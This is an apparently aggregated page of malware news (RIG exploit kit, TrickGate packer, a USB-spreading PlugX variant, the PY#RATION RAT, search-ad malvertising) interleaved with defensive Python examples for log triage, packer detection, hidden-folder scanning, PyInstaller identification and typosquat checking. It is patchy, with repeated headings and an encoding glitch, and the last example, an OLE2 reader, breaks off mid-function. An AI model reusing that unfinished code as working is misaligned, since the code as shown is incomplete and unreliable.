Malware comes in many forms: unwanted programs can act as pathogens, spies, or remote controls on a computer. Whether it is a virus, spyware, or a Trojan horse, this harmful software should be kept well away from your machine. What are the different types of malware? We show you how to protect yourself from them and what steps to take if your computer or web space is affected.
The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal.
“RIG EK is a financially-motivated program that has been active since 2014,” Swiss cybersecurity company PRODAFT said in an exhaustive report shared with The Hacker News.
“Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates.”
Exploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers.
RIG EK is run as a service: threat actors pay the RIG EK administrator to install malware of their choice on victim machines. The operators rely primarily on malvertising to achieve a high infection rate and broad coverage.
In a typical infection chain, visitors who use a vulnerable browser version to open an actor-controlled web page or a compromised-but-legitimate website are redirected by malicious JavaScript to a proxy server, which in turn communicates with an exploit server to deliver the appropriate browser exploit.
The exploit server, for its part, detects the user’s browser by parsing the User-Agent string and returns the exploit that “matches the pre-defined vulnerable browser versions.”
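The User-Agent check the exploit server performs is the same check a defender can run in reverse over web-proxy logs, to find the clients an exploit kit would consider worth attacking. The following is an added example written for this page, not code from PRODAFT's report: it fingerprints browser family and major version from the User-Agent and flags end-of-life browsers and versions below a patch baseline. The log format, the IP addresses, the User-Agent strings and the baseline versions are all constructed assumptions for the example.

```python
"""Triage of web-proxy logs for clients that an exploit kit's User-Agent check would
consider worth attacking: end-of-life browsers and versions below a patch baseline.
The log format, IPs and User-Agent strings below are constructed for the example."""
import re
from collections import Counter

# Minimum major versions treated as "current" (assumption: set these from your own patch baseline).
BASELINE = {"Chrome": 109, "Firefox": 109, "Edge": 109}
END_OF_LIFE = {"IE"}          # Internet Explorer reached end of support in June 2022

# Order matters: Edge and IE 11 User-Agents also carry Chrome/ and Gecko-style tokens.
UA_PATTERNS = [
    ("IE", re.compile(r"MSIE (\d+)")),                      # IE 10 and older announce themselves
    ("IE", re.compile(r"Trident/\d+\.\d+.*\brv:(\d+)")),    # IE 11 dropped the MSIE token
    ("Edge", re.compile(r"\bEdg[A-Za-z]*/(\d+)")),
    ("Firefox", re.compile(r"\bFirefox/(\d+)")),
    ("Chrome", re.compile(r"\bChrome/(\d+)")),
]

# Constructed log format: timestamp, client IP, method, URL, quoted User-Agent.
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')

def fingerprint(user_agent: str):
    """Return (browser, major_version); ("unknown", 0) when no pattern matches."""
    for browser, pattern in UA_PATTERNS:
        m = pattern.search(user_agent)
        if m:
            return browser, int(m.group(1))
    return "unknown", 0

def assess(user_agent: str):
    """Return the reason a client looks exploitable, or None if it passes the baseline."""
    browser, major = fingerprint(user_agent)
    if browser in END_OF_LIFE:
        return f"{browser} {major}: end-of-life browser"
    minimum = BASELINE.get(browser)
    if minimum is not None and major < minimum:
        return f"{browser} {major}: below baseline {minimum}"
    return None

def triage(log_lines):
    """Parse proxy log lines and return [(ip, reason)] for clients worth investigating."""
    flagged = []
    for line in log_lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue                      # malformed line; in production, count these separately
        reason = assess(m.group("ua"))
        if reason:
            flagged.append((m.group("ip"), reason))
    return flagged

# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    '2023-02-27T10:14:03Z 10.0.0.15 GET http://intranet.example/ "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '2023-02-27T10:14:09Z 10.0.0.22 GET http://intranet.example/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"',
    '2023-02-27T10:14:12Z 10.0.0.31 GET http://intranet.example/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50"',
    '2023-02-27T10:14:20Z 10.0.0.44 GET http://intranet.example/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"',
]

if __name__ == "__main__":
    for ip, reason in triage(SAMPLE_LOG):
        print(ip, reason)
    print(Counter(fingerprint(LOG_LINE.match(l).group("ua"))[0] for l in SAMPLE_LOG))
```

Run against the constructed log, two of the four clients are flagged: the IE 11 host and the Chrome 98 host. The pattern order matters for the same reason the exploit server must get it right: an Edge User-Agent also contains a Chrome/ token, so matching Chrome first would misclassify it.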
“The artful design of the Exploit Kit allows it to infect devices with little to no interaction from the end user,” the researchers said. “Meanwhile, its use of proxy servers makes infections harder to detect.”
Since arriving on the scene in 2014, RIG EK has been observed delivering a wide range of financial trojans, stealers, and ransomware such as AZORult, CryptoBit, Dridex, Raccoon Stealer, and WastedLoader. The operation was dealt a huge blow in 2017 following a coordinated action that dismantled its infrastructure.
Packers are an increasingly important tool for cybercriminals. On hacker forums the packer is sometimes referred to as a "Crypter" or as "FUD" (fully undetectable). Its primary function is to make it harder for antivirus engines to identify malicious code, so that operators can distribute their malware faster and with fewer consequences. One defining quality of a commercial Packer-as-a-Service is that it is payload-agnostic: it can wrap many different malicious samples, which opens up a lot of opportunities for cybercriminals. Another is that it is transformational: because the packer's wrapper changes frequently, the packed samples keep evading security products.
According to Check Point, TrickGate is a good illustration of a robust and resilient packer-as-a-service. It has stayed under the radar of security researchers for years and keeps improving in a variety of ways.
Although a good deal of research has been done on the packer itself, TrickGate is a master of disguise and has been given a number of different names because of its many characteristics, including "TrickGate," "Emotet's packer," "new loader," "Loncom," and "NSIS-based crypter."
Check Point first observed TrickGate at the end of 2016, when it was used to spread the Cerber ransomware. Since then its researchers have tracked TrickGate continuously and found it used to deliver many kinds of malicious tools, including ransomware, RATs, information stealers, bankers, and miners. A significant number of APT groups and other threat actors employ TrickGate to wrap their malicious code in order to evade security solutions. Some of the most well-known and widely distributed malware families have been wrapped by TrickGate,
including Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more.
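A frequently changing wrapper defeats signatures, but it cannot hide what packing does to a binary's layout, which is why packer triage starts with the section table rather than with a hash. The following is an added example written for this page, not Check Point's tooling: it parses the PE section table without third-party libraries and flags sections whose Shannon entropy approaches 8 bits per byte, that are empty on disk but large in memory (the unpacking stub fills them at runtime), or that are mapped both writable and executable. The entropy threshold, the section names and the embedded PE image (which is not loadable) are constructed for the example.

```python
"""Packer triage for a Windows PE without third-party libraries: parse the section
table and flag sections whose Shannon entropy approaches 8 bits/byte (packed or
encrypted data), that are empty on disk but large in memory (filled at runtime by
an unpacking stub), or that are mapped writable and executable."""
import hashlib
import math
import struct
from collections import Counter

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")       # IMAGE_SECTION_HEADER (40 bytes)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
ENTROPY_THRESHOLD = 7.0                           # bits/byte; assumed cut-off, tune on your own corpus

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def pe_sections(data: bytes) -> list:
    """Walk the PE headers and return one dict per section (name, sizes, entropy, flags)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_hdr_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_hdr_size                 # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rawsize, rawptr, _, _, _, _, chars = SECTION_HDR.unpack_from(data, table + i * SECTION_HDR.size)
        raw = data[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vsize": vsize, "rawsize": rawsize,
            "entropy": round(shannon_entropy(raw), 2),
            "chars": chars,
        })
    return sections

def packer_indicators(data: bytes) -> list:
    """Return (section, reason) pairs; several hits on one file are a strong packer signal."""
    hits = []
    for s in pe_sections(data):
        if s["entropy"] >= ENTROPY_THRESHOLD:
            hits.append((s["name"], f"high entropy {s['entropy']}"))
        if s["rawsize"] == 0 and s["vsize"] >= 0x1000:
            hits.append((s["name"], "empty on disk, filled at runtime"))
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            hits.append((s["name"], "writable+executable"))
    return hits

def build_sample_pe() -> bytes:
    """Constructed, non-loadable PE image with a typical packed layout: an empty .text that is
    large in memory, a high-entropy W+X section holding the packed code, and a plain stub."""
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))   # 4096 high-entropy bytes
    stub = b"\x90" * 512                                                          # zero-entropy filler
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0, 0x0102)   # i386, 3 sections, no optional header
    data_off = e_lfanew + 4 + 20 + 3 * SECTION_HDR.size
    def section(name, vsize, rawsize, rawptr, chars):
        return SECTION_HDR.pack(name.ljust(8, b"\0"), vsize, 0, rawsize, rawptr, 0, 0, 0, 0, chars)
    image = (dos + b"PE\0\0" + coff
             + section(b".text", 0x8000, 0, 0, 0x60000020)
             + section(b".packed", len(packed), len(packed), data_off, 0xE0000040)
             + section(b".stub", len(stub), len(stub), data_off + len(packed), 0x60000020))
    return image + packed + stub

if __name__ == "__main__":
    for name, reason in packer_indicators(build_sample_pe()):
        print(f"{name:<8} {reason}")
```

On the constructed image the empty `.text` and the high-entropy, writable and executable `.packed` section each trip an indicator while the plain `.stub` trips none. Real samples need the threshold tuned: compressed resources and certificates also score high, so treat a single indicator as a lead and the combination as the signal.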
The Palo Alto Networks Unit 42 incident response team has discovered a new variant of PlugX malware that is distributed via removable USB devices and targets Windows PCs. This should not come as a surprise since 95.6% of new malware or their variants in 2022 targeted Windows.
According to Unit 42 researchers, the new variant was detected during an incident response engagement following a Black Basta ransomware attack. The researchers uncovered several malware samples and tools on the victims' devices, including the Brute Ratel C4 red-teaming tool, GootLoader malware, and an old PlugX sample.
PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups. The malware was previously used in many high-profile cyberattacks, such as the 2015 U.S. Government Office of Personnel Management (OPM) breach.
The same backdoor was also used in the 2018 malware attack on the Android devices of minority groups in China. Most recently, in November 2022, researchers linked Google Drive phishing scams to the group infamously known for using PlugX malware.
Scope of Infection
The new variant stood out because it can infect any attached removable USB device (floppy, flash or thumb drives) and, in turn, any system such a device is later plugged into.
So far, no evidence connects the PlugX backdoor or Gootkit to the Black Basta ransomware group, and the researchers believe another actor may have deployed it. They also noted that the malware copies all Adobe PDF and Microsoft Word documents from the host into a hidden folder that it creates on the USB device.
Malware Analysis
Unit 42 researchers Jen Miller-Osborn and Mike Harbison explained in their blog post that this variant of PlugX is a wormable, second-stage implant. It infects USB devices and stays concealed from the Windows file system view, so the user would not suspect that their USB device is being used to exfiltrate data from networks.
The USB variant is distinctive in that it uses a specific Unicode character, the non-breaking space (U+00A0), to hide files on a USB device plugged into a workstation. Windows Explorer does not render this character visibly, so the directory appears to have no name at all.
Furthermore, the malware can hide actor files on a removable USB device through a novel technique that works even on the latest Windows OS.
The malware is designed to infect the host and copy its malicious code to any removable device connected to the host, hiding it in a folder that mimics the Recycle Bin. Because Windows does not show hidden files by default, the malicious files in that folder are not displayed; surprisingly, they remain invisible even after hidden files are enabled in the Explorer settings. They can only be seen and recovered from a Unix-like OS or by mounting the USB device in a forensic tool.
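The scan a responder can run over a stick mounted on an analysis box to surface such a folder, as an added example written for this page rather than Unit 42's tooling: it flags any directory or file whose name consists only of blank or zero-width characters, which generalises the single U+00A0 case the text describes, spells the name out as code points so it can be reported unambiguously, and, when run on Windows, also reports the hidden/system attribute bits. The sample volume built in the test is constructed.

```python
"""Scan a mounted volume (e.g. a suspect USB stick mounted on an analysis box) for
directory and file names that render as blank in Windows Explorer, such as the
single NO-BREAK SPACE (U+00A0) the PlugX USB variant uses for its staging folder."""
import os
import stat
import unicodedata

# Unicode categories whose characters are invisible in a file name: space separators
# (Zs, which includes U+00A0) and format characters (Cf: zero-width space, joiners, BOM).
INVISIBLE_CATEGORIES = {"Zs", "Cf"}

def is_invisible_name(name: str) -> bool:
    """True when every code point in the name is blank or zero-width."""
    return bool(name) and all(unicodedata.category(ch) in INVISIBLE_CATEGORIES for ch in name)

def codepoints(name: str) -> str:
    """Spell a name out as code points, so that a 'blank' name can be reported unambiguously."""
    return " ".join(f"U+{ord(ch):04X}" for ch in name)

def hidden_system_flags(path: str) -> str:
    """Report HIDDEN/SYSTEM attribute bits when available (Windows only; '' elsewhere).
    PlugX combines the blank name with these attributes to keep the folder out of Explorer."""
    attrs = getattr(os.lstat(path), "st_file_attributes", None)
    if attrs is None:
        return ""
    flags = []
    if attrs & stat.FILE_ATTRIBUTE_HIDDEN:
        flags.append("HIDDEN")
    if attrs & stat.FILE_ATTRIBUTE_SYSTEM:
        flags.append("SYSTEM")
    return "+".join(flags)

def scan_volume(root: str) -> list:
    """Walk the volume and return one record per entry whose name is entirely invisible."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if is_invisible_name(name):
                full = os.path.join(dirpath, name)
                is_dir = os.path.isdir(full)
                hits.append({
                    "path": full,
                    "codepoints": codepoints(name),
                    "attrs": hidden_system_flags(full),
                    "is_dir": is_dir,
                    "children": len(os.listdir(full)) if is_dir else 0,
                })
    return hits

if __name__ == "__main__":
    import sys
    for hit in scan_volume(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{hit['path']!r}  name={hit['codepoints']}  attrs={hit['attrs'] or '-'}  children={hit['children']}")
```

Run it with the mount point as the only argument. Printing the name with `!r` and as code points matters: a report that literally shows a blank folder name is useless to the next analyst.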
The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.
Cybersecurity researchers at threat analysis firm Securonix have discovered a new malware, dubbed PY#RATION, that lets attackers steal sensitive files and log keystrokes on affected devices.
Malware Distribution Technique
The malware is distributed through a conventional phishing email carrying a password-protected ZIP archive. Unpacking it yields two shortcut files posing as images, front.jpg.lnk and back.jpg.lnk; when launched, they display the front and back of a driver's license that does not exist.
At the same time the malicious code runs, downloading two files from the internet, front.txt and back.txt, which are renamed to .bat files and executed. The malware disguises itself as the Cortana virtual assistant to maintain persistence on the system.
What is PY#RATION
PY#RATION is a Python-based malware that displays a RAT (remote access trojan) like behaviour to sustain control over the affected host. The malware has various capabilities and functionalities, such as keylogging and data exfiltration.
What sets it apart is its use of WebSockets for C2 communication and exfiltration, which helps it evade network security solutions and antivirus programs. Using the Socket.IO framework (a third-party Python library, not part of the standard library) to handle client-server WebSocket communication, the malware receives commands and sends data back over a single persistent TCP connection.
Moreover, according to Securonix's blog post, the attackers keep using the same C2 address, which the IPVoid checking service has yet to flag. Researchers believe the malware is still under active development, having observed multiple versions since August 2022. The malware receives instructions from its operators over the WebSocket channel and returns sensitive data the same way.
Potential Dangers
The Python RAT is packed into an executable with automated packers such as "pyinstaller" and "py2exe", which convert Python code into Windows executables. This inflates the payload size: the first detected version, 1.0, was 14 MB, while the latest, 1.6.0, is 32 MB and contains 1,000+ lines and additional code.
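A PyInstaller build is easy to recognise because the bootloader appends a fixed-format "cookie" to the end of the executable, and that cookie records which Python version and runtime library were bundled. The following is an added example written for this page, not Securonix's code: it locates the cookie the way pyinstxtractor does and reads its fields, which tells an analyst both that a sample is a PyInstaller bundle and which Python version to set up for decompiling the extracted .pyc files. The fake bundle it parses is constructed inline.

```python
"""Identify a PyInstaller-built executable by the CArchive cookie the bootloader
appends to the file, and read the Python version and runtime library recorded in
it (the same approach pyinstxtractor uses). The sample bundle is constructed."""
import struct

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"          # 8-byte magic that opens the cookie
COOKIE_V20 = struct.Struct("!8siiii")              # PyInstaller 2.0: magic, pkg len, toc off, toc len, pyver
COOKIE_V21 = struct.Struct("!8siiii64s")           # PyInstaller 2.1+: the same plus the Python lib name

def parse_pyinstaller_cookie(data: bytes):
    """Return cookie fields as a dict, or None if no PyInstaller archive is present."""
    # The bootloader itself contains the magic (it searches for it too), so take the
    # LAST occurrence: the cookie sits at the end of the appended archive.
    pos = data.rfind(PYINST_MAGIC)
    if pos == -1:
        return None
    tail = len(data) - pos
    if tail >= COOKIE_V21.size:
        _, pkg_len, toc_off, toc_len, pyver, pylib = COOKIE_V21.unpack_from(data, pos)
        cookie_size, layout = COOKIE_V21.size, "2.1+"
        pylib_name = pylib.split(b"\0", 1)[0].decode("ascii", "replace")
    elif tail >= COOKIE_V20.size:
        _, pkg_len, toc_off, toc_len, pyver = COOKIE_V20.unpack_from(data, pos)
        cookie_size, layout = COOKIE_V20.size, "2.0"
        pylib_name = ""
    else:
        return None
    # pyver is 2 digits up to Python 3.9 (e.g. 38) and 3 digits from 3.10 on (e.g. 311).
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    archive_start = pos + cookie_size - pkg_len       # pkg_len counts the whole archive incl. cookie
    if archive_start < 0 or toc_off < 0 or toc_off + toc_len > pkg_len:
        return None                                   # magic matched but the fields are nonsense
    return {
        "layout": layout,
        "python_version": f"{major}.{minor}",
        "pylib": pylib_name,
        "archive_start": archive_start,
        "archive_len": pkg_len,
        "toc_offset": toc_off,
        "toc_len": toc_len,
    }

def build_sample_bundle() -> bytes:
    """Constructed stand-in for a PyInstaller one-file EXE: a fake bootloader (which, like
    the real one, embeds the magic), a dummy archive body, and a 2.1+ cookie at the end."""
    bootloader = b"MZ" + b"\x90" * 64 + PYINST_MAGIC + b"\0" * 8
    archive_body = b"PYZ-00.pyz" + b"\x11" * 200
    pkg_len = len(archive_body) + COOKIE_V21.size
    cookie = COOKIE_V21.pack(PYINST_MAGIC, pkg_len, 120, 60, 311, b"python311.dll")
    return bootloader + archive_body + cookie

if __name__ == "__main__":
    print(parse_pyinstaller_cookie(build_sample_bundle()))
```

Searching from the end of the file rather than the start is the detail that matters: the bootloader stub embeds the same magic bytes, so a forward search returns the wrong offset and garbage fields.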
Researchers claim that the latest version of the payload remains undetected by all except for one antivirus engine listed on VirusTotal.
The malware features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookies exfiltration. Who's behind this campaign, the distribution volume, and the campaign objectives are still unclear.
The FBI recently warned the public about search engine ads pushing malware disguised as legitimate software: an old tactic that has lately produced a flood of malicious ads served to users searching via Google and Bing for software, cracked software, drivers, and anything else that can be downloaded.
The recent explosion of search engine malvertising
Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users, including malicious links or attachments served via email and messages, posts on social media, online forums and IM groups, and malicious ads placed in search engine results.
The latter tactic is particularly good at reaching a wide pool of potential targets, since most internet users also use search engines.
Lately, though, they have been overdoing it; or perhaps it's just that more people have begun noticing it and talking about it online?
Many documented campaigns
HP threat researcher Patrick Schläpfer says that they have seen "a significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique."
Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zip, OBS, etc.).
The malicious ads often manage to be the first link users see when searching for software on Google, and point to a (usually typosquatting) domain that resembles the original software manufacturer's page. Clicking on the download link triggers the download of the malicious package from a file-hosting and sharing service (e.g., Dropbox), an app development platform (e.g., Google Firebase), or a code-hosting service (e.g., GitHub).
Protect yourself and your loved ones
While Google and Microsoft are trying to keep their users safe, it is becoming obvious that they are failing to keep pace with the rapidly changing tricks cybercriminals use to push these ads.
As some ads are removed and new ones inevitably spring up, we are forced to do what we can to protect ourselves.
Just being aware of this danger and of how prevalent these malicious ads are will help. Also, carefully check whether the URL the advertisement points to is the correct one (e.g., by comparing it with the official domain listed on the software's Wikipedia page).
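The "compare the domain against the official one" check can be automated for a help desk or a browser extension, and doing so shows what typosquatting actually exploits: digit-for-letter swaps, Cyrillic homoglyphs, an inserted hyphen, or the real domain used as a subdomain label of something else. The following is an added example written for this page, not code from the article or from HP: it normalises confusables, then compares the registrable domain against an allow-list of the vendors' real sites by edit distance. The allow-list, the threshold and every lookalike URL in the test are constructed assumptions for the example, not observed indicators.

```python
"""Check whether the URL behind a search ad belongs to the software vendor or to a
lookalike: normalises confusable characters, then compares the registrable domain
against an allow-list by edit distance. Domains in the allow-list are the vendors'
real sites; every test URL is constructed for the example, not an observed IOC."""
import unicodedata
from urllib.parse import urlparse

# Official domains of the software named in the text (assumption: keep your own list current).
OFFICIAL = {"notepad-plus-plus.org", "gimp.org", "blender.org", "audacityteam.org",
            "7-zip.org", "obsproject.com"}
# Substitutions that look alike in an address bar: Cyrillic homoglyphs and digit-for-letter swaps.
HOMOGLYPHS = str.maketrans("аеорсух", "aeopcyx")
DIGITS = str.maketrans("01358", "olesb")
MAX_EDITS = 2          # assumed threshold; 1 is stricter, 3 starts flagging unrelated short names

def normalise(domain: str) -> str:
    d = unicodedata.normalize("NFKC", domain).lower().translate(HOMOGLYPHS).translate(DIGITS)
    return d.replace("rn", "m").replace("vv", "w")

def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable(host: str) -> str:
    """Last two labels; assumption: two-label public suffixes such as co.uk are not handled."""
    return ".".join(host.split(".")[-2:])

def classify(url: str):
    """Return ("official" | "lookalike" | "unrelated", matched official domain or None)."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    if host.startswith("www."):
        host = host[4:]
    if host in OFFICIAL:
        return "official", host
    for official in OFFICIAL:
        if host.endswith("." + official):          # genuine subdomain, e.g. download.blender.org
            return "official", official
        if host.startswith(official + "."):        # vendor domain reused as a subdomain label
            return "lookalike", official
    candidate = normalise(registrable(host))
    closest = min(OFFICIAL, key=lambda o: levenshtein(candidate, o))
    if levenshtein(candidate, closest) <= MAX_EDITS:
        return "lookalike", closest
    core = candidate.split(".")[0]
    for official in OFFICIAL:
        if official.split(".")[0] in core:         # vendor name padded with extra words
            return "lookalike", official
    return "unrelated", None

if __name__ == "__main__":
    for u in ("https://notepad-plus-plus.org/downloads/", "https://www.notepad-p1us-plus.org/download",
              "https://gimp.org.example/download", "https://en.wikipedia.org/wiki/GIMP"):
        print(classify(u), u)
```

Note that only the host is examined: a GitHub URL whose path contains the product name is reported as unrelated, which is correct, since the path is under the attacker's control on any code-hosting service. A production version would replace the two-label `registrable()` shortcut with a public-suffix list.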
If you fail to spot the malicious nature of the ad and the typosquatting site, do not ignore warnings you might get from Microsoft Defender or whichever security solution you use.
But the best advice may be to avoid clicking on Google and Bing ads altogether, either by recognising and consciously avoiding them, or by installing an ad-blocking extension that stops those ads from being displayed. The latter option is perhaps the best one for less tech-savvy users, as it removes the temptation of clicking willy-nilly on potentially malicious ads wherever they might pop up.
Google and Microsoft, for their part, may want to ramp up their efforts to block this kind of abuse of their ad networks, or risk dented reputations and more and more users turning to ad blockers.
Malware analysis tools are essential for security professionals, who constantly need to learn new tools, techniques, and concepts to analyze sophisticated threats and current cyber attacks.
Malware Analysis Tools & Courses
Malware Analysis Courses
Hex Editors
Disassemblers
Detection and Classification
Dynamic Binary Instrumentation
Dynamic Analysis
Deobfuscation
Debugging
Malware Analysis Courses
Reverse Engineering
Binary Analysis
Decompiler
Bytecode Analysis
Reconstruction
Memory Forensics
Windows Artifacts
Storage and Workflow
Malware samples
Courses
Domain Analysis
Books
Malware Analysis Courses
Here we have listed the best courses for malware analysis, reverse engineering, exploit development and more.
A hex editor (or binary file editor or byte editor) is a type of computer program that allows manipulation of the fundamental binary data that constitutes a computer file. The name "hex" comes from "hexadecimal", a standard numerical format for representing binary data.
A disassembler is a computer program that translates machine language into assembly languageâthe inverse operation to that of an assembler.
A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.
This introductory malware dynamic analysis class is aimed at people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected with various tools.
The class is hands-on: students use various tools to look at how malware is persisting, communicating, and hiding.
WinDbg – multipurpose debugger for the Microsoft Windows operating system, used to debug user-mode applications, device drivers, and kernel-mode memory dumps.
x64dbg – an open-source x64/x32 debugger for Windows.
Binary Format and Binary Analysis
The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.
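Because so many document analysis tools (olevba, oledump, OfficeMalScanner) are built on this container, it is worth knowing how little is needed to read it: a 512-byte header, a FAT that chains sectors, and a directory of storages and streams. The following is an added example written for this page, not code from any of the listed tools: a minimal reader that validates the header, rebuilds the FAT from the header's DIFAT entries, walks the directory chain, and extracts regular streams. The sample document it parses is constructed inline (it is not a real .doc), and files that need more than 109 FAT sectors or that keep data in the mini stream are deliberately left out of scope.

```python
"""Minimal reader for the Compound File Binary (OLE2) container: validates the header,
rebuilds the FAT from the header DIFAT, walks the directory to list storages and
streams, and extracts regular streams. The sample document is constructed inline."""
import struct

CFB_SIGNATURE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
HEADER = struct.Struct("<8s16sHHHHH6sIIIIIIIII109I")     # 512-byte header incl. 109 DIFAT entries
DIRENTRY = struct.Struct("<64sHBBIII16sIQQIQ")           # 128-byte directory entry
MAXREGSECT, FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFA, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
OBJECT_TYPES = {1: "storage", 2: "stream", 5: "root"}

def is_compound_file(data: bytes) -> bool:
    return len(data) >= 512 and data[:8] == CFB_SIGNATURE

class CompoundFile:
    def __init__(self, data: bytes):
        if not is_compound_file(data):
            raise ValueError("not a Compound File Binary (bad signature or too short)")
        fields = HEADER.unpack_from(data, 0)
        (_, _, self.minor, self.major, byte_order, self.sector_shift, self.mini_shift, _,
         _, self.num_fat, self.first_dir, _, self.mini_cutoff,
         self.first_minifat, self.num_minifat, self.first_difat, self.num_difat) = fields[:17]
        if byte_order != 0xFFFE or self.major not in (3, 4):
            raise ValueError("unsupported byte order or major version")
        if self.sector_shift != (9 if self.major == 3 else 12):
            raise ValueError("sector shift inconsistent with major version")
        self.data = data
        self.sector_size = 1 << self.sector_shift
        # FAT = concatenation of the FAT sectors named in the header DIFAT. Files with more
        # than 109 FAT sectors chain further DIFAT sectors; this example does not follow them.
        self.fat = []
        for sect in fields[17:17 + self.num_fat]:
            if sect > MAXREGSECT:
                break
            self.fat.extend(struct.unpack(f"<{self.sector_size // 4}I", self.sector(sect)))

    def sector(self, n: int) -> bytes:
        off = (n + 1) * self.sector_size                # sector 0 starts right after the header
        chunk = self.data[off:off + self.sector_size]
        if len(chunk) != self.sector_size:
            raise ValueError(f"sector {n} beyond end of file (truncated?)")
        return chunk

    def chain(self, start: int) -> list:
        """Follow a FAT chain; loops and out-of-range links are treated as corruption."""
        sectors, seen, s = [], set(), start
        while s <= MAXREGSECT:
            if s in seen or s >= len(self.fat):
                raise ValueError("corrupt FAT chain")
            seen.add(s)
            sectors.append(s)
            s = self.fat[s]
        return sectors

    def directory(self) -> list:
        entries = []
        for s in self.chain(self.first_dir):
            raw = self.sector(s)
            for i in range(self.sector_size // DIRENTRY.size):
                name, nlen, otype, _, _, _, child, _, _, _, _, start, size = DIRENTRY.unpack_from(raw, i * DIRENTRY.size)
                if otype == 0:
                    continue                               # unallocated slot
                entries.append({
                    "name": name[:max(nlen - 2, 0)].decode("utf-16-le", "replace"),  # nlen counts the null
                    "type": OBJECT_TYPES.get(otype, f"type{otype}"),
                    "child": child, "start": start,
                    "size": size if self.major == 4 else size & 0xFFFFFFFF,         # v3: low 32 bits only
                })
        return entries

    def read_stream(self, entry: dict) -> bytes:
        """Bytes of a regular stream. Streams smaller than the cutoff live in the root's
        mini stream and need the mini FAT, which this example does not implement."""
        if entry["type"] != "stream":
            raise ValueError("not a stream")
        if entry["size"] < self.mini_cutoff:
            raise NotImplementedError("mini stream extraction not implemented here")
        return b"".join(self.sector(s) for s in self.chain(entry["start"]))[:entry["size"]]

def build_sample_doc() -> bytes:
    """Constructed v3 document: sector 0 = FAT, sector 1 = directory, sectors 2-9 = one
    4096-byte stream named ThisDocument holding VBA-looking text (not a real .doc)."""
    ss = 512
    payload = (b'Attribute VB_Name = "ThisDocument"\r\nSub AutoOpen()\r\nEnd Sub\r\n').ljust(4096, b"\0")
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 10)) + [ENDOFCHAIN]   # stream chain 2->3->...->9->END
    fat += [FREESECT] * (ss // 4 - len(fat))
    def entry(name, otype, child, start, size):
        raw = name.encode("utf-16-le") + b"\0\0"
        return DIRENTRY.pack(raw.ljust(64, b"\0"), len(raw), otype, 1, FREESECT, FREESECT, child,
                             b"\0" * 16, 0, 0, 0, start, size)
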